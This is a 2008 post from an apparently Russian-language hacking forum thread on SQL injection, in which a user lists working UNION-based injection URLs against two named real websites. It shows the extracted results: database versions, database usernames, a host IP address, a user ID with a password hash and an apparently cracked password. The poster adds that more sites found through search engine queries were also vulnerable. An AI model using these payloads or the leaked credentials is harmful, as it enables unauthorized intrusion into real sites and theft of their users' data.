Тема: SQL Инъекции
Показать сообщение отдельно

  #8  
Старый 18.02.2008, 09:33
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
http://worldnetdaily.com/index.php?fa=PAGE.view&pageId=999999+union+select+ 1,2,concat(version(),0x3a,user(),0x3a,database()), 4,5,6,7/*
5.0.22-log:wndMysqlUser@pr-01:wndNew

http://worldnetdaily.com/index.php?fa=PAGE.view&pageId=999999+union+select+ 1,2,concat(userId,char(58),password),4,5,6,7+from+ user_users/*
1:530a14617895ab8725760a2a401162b4

lawnmower
==================================================
http://www.fireworkszone.com/index.php?root=39&extension=&idChapitre=47+union+s elect+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(), 0x203a,user(),0x3a,database()),14,15,16,17,18,19,2 0/*
4.1.11-Debian_4online1-log
:fireworkszonecom@212.27.35.49:fireworkszonecom

ндя idchapitre= вот он враг

гуголь нашел еще 5 сайтов 4 оказались уязвимы... поищем еще
Последний раз редактировалось xcedz; 18.02.2008 в 13:27..
 
Ответить с цитированием